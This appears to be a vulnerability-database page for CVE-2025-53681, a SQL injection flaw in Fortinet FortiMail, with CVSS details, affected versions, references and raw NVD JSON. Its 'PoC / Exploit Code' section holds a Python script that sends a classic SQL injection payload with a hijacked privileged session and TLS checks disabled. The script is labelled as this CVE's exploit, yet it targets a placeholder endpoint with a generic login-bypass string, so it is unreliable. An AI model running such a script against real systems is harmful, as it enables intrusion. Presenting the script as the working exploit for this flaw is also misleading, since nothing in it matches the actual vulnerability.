CVE-2025-53681

Description

An improper neutralization of special elements used in an SQL Command ("SQL Injection&") vulnerability [CWE-89] vulnerability in Fortinet FortiMail 7.6.0 through 7.6.3, FortiMail 7.4.0 through 7.4.5, FortiMail 7.2.0 through 7.2.8 allows an authenticated privileged attacker to execute unauthorized code or commands via specifically crafted HTTP or HTTPS requests.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

FortiMail 7.6.0 - 7.6.3

FortiMail 7.4.0 - 7.4.5

FortiMail 7.2.0 - 7.2.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Exploit Title: Fortinet FortiMail SQL Injection PoC (CVE-2025-53681)
# Description: This script demonstrates sending a crafted request to trigger the SQLi.
# Note: Requires authenticated high-privileged session.

target_url = "https://<fortimail-ip>/api/vulnerable_endpoint"

# Attacker's session cookie (High privilege required)
cookies = {
    "CCSRFToken": "<valid_csrf_token>", 
    "ADSESSIONID": "<valid_session_id>"
}

# Headers
headers = {
    "User-Agent": "Mozilla/5.0",
    "Content-Type": "application/x-www-form-urlencoded"
}

# Malicious payload to test SQL Injection
# Example: Attempting to bypass logic or extract data
payload = "admin' OR '1'='1'--"

data = {
    "username": payload,
    "submit": "submit"
}

try:
    response = requests.post(target_url, headers=headers, cookies=cookies, data=data, verify=False, timeout=10)
    
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response content:")
        print(response.text[:500]) # Print first 500 chars of response
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-53681
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-53681
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-53681/
[4] VulDB https://vuldb.com/cve/CVE-2025-53681
[5] https://fortiguard.fortinet.com/psirt/FG-IR-26-132

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-53681", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:16:35.860", "lastModified": "2026-05-12T18:57:02.307", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An improper neutralization of special elements used in an SQL Command (\"SQL Injection&\") vulnerability [CWE-89] vulnerability in Fortinet FortiMail 7.6.0 through 7.6.3, FortiMail 7.4.0 through 7.4.5, FortiMail 7.2.0 through 7.2.8 allows an authenticated privileged attacker to execute unauthorized code or commands via specifically crafted HTTP or HTTPS requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-26-132", "source": "[email protected]"}]}}